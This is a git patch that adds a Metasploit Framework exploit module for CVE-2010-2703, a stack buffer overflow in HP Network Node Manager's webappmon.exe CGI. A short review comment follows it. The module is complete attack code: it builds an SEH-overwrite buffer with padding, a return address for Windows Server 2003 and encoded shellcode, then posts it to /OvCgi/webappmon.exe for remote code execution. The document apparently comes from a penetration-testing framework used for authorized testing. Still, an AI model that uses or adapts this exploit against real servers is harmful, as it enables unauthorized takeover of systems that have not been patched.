From 1a34d81aabb3f3f6fde515ab6e56986e6091b097 Mon Sep 17 00:00:00 2001
From: Wei Chen
Date: Wed, 23 Mar 2011 03:23:06 +0000
Subject: [PATCH] Added CVE-2010-2703
git-svn-id: file:///home/svn/framework3/trunk@12083 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../windows/http/hp_nnm_webappmon_execvp.rb | 103 ++++++++++++++++++
 1 file changed, 103 insertions(+)
 create mode 100644 modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb
diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb
new file mode 100644
index 0000000000..d73f216bbe
--- /dev/null
+++ b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb
@@ -0,0 +1,103 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::Seh
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "HP NNM CGI webappmon.exe execvp Buffer Overflow",
+ 'Description' => %q{
+ This module exploits a buffer overflow in HP NNM's webappmon.exe.
+ The vulnerability occurs when function "execvp_nc" fails to do any bounds-
+ checking before strcat is used to append user-supplied input to a buffer.
+ },
+ 'License' => MSF_LICENSE,
+ 'Version' => "$Revision$",
+ 'Author' =>
+ [
+ 'shahin ',
+ 'sinn3r',
+ ],
+ 'References' =>
+ [
+ ['CVE', '2010-2703'],
+ ['OSVDB', '66514'],
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => [*(0x00..0x09)].pack("C*") + [*(0x0a..0x0f)].pack("C*") + [*(0x10..0x1f)].pack("C*") + "\x7f",
+ 'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
+ 'EncoderOptions' => {'BufferRegister'=>'ECX'},
+ },
+ 'DefaultOptions' =>
+ {
+ 'ExitFunction' => "seh",
+ 'AutoRunScript' => 'migrate -f',
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Windows Server 2003 Ent', {'Ret'=>0x5A30532D} ],
+ ],
+ 'DisclosureDate' => "SEP 6 2010"))
+
+ register_options(
+ [
+ Opt::RPORT(80),
+ ], self.class)
+ end
+
+ def exploit
+ nops = make_nops(1000)*10
+
+ sploit = nops[0, 5455]
+ sploit << generate_seh_record(target.ret)
+ sploit << "\x61"*13
+ sploit << "\x51"
+ sploit << "\xc3"
+ sploit << nops[0, 57]
+ sploit << payload.encoded
+ sploit << nops[0, 10000-sploit.length]
+
+ post_data = "ins=#{sploit}&sel=#{sploit}&app=#{sploit}&act=#{sploit}&arg=#{sploit}&help=#{sploit}&cache=1600 HTTP/1.1"
+
+ connect
+
+ print_status("Sending malicious request...")
+ send_request_raw({
+ 'uri' => '/OvCgi/webappmon.exe',
+ 'data' => post_data,
+ 'version' => '1.1',
+ 'method' => 'POST',
+ 'headers' => {
+ 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+ 'Accept-Language' => 'en-us,en;q=0.5',
+ 'Accept-Encoding' => 'gzip,deflate',
+ 'Accept-Charset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
+ 'Keep-Alive' => '300',
+ 'Connection' => 'Keep-Alive',
+ 'Cache-Control' => 'max-age=0',
+ 'Content-Length' => post_data.length,
+ 'Content-Type' => 'application/x-www-form-urlencoded',
+ }
+ }, 3)
+
+ handler
+ disconnect
+
+ end
+end
\ No newline at end of file
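Review bot: The `'BadChars'` entry in the `'Payload'` hash of `initialize` concatenates three packed ranges (`0x00..0x09`, `0x0a..0x0f`, `0x10..0x1f`) that are contiguous, so the expression describes the single set `0x00..0x1f` while reading as if the three groups were distinct. It would be clearer as `'BadChars' => [*(0x00..0x1f)].pack("C*") + "\x7f",` together with a one-line comment stating why control bytes and 0x7f are excluded, which the module does not explain. The explicit `connect` before `send_request_raw` in `exploit` also looks redundant if the HttpClient mixin opens its own connection, but that depends on mixin behaviour outside this patch.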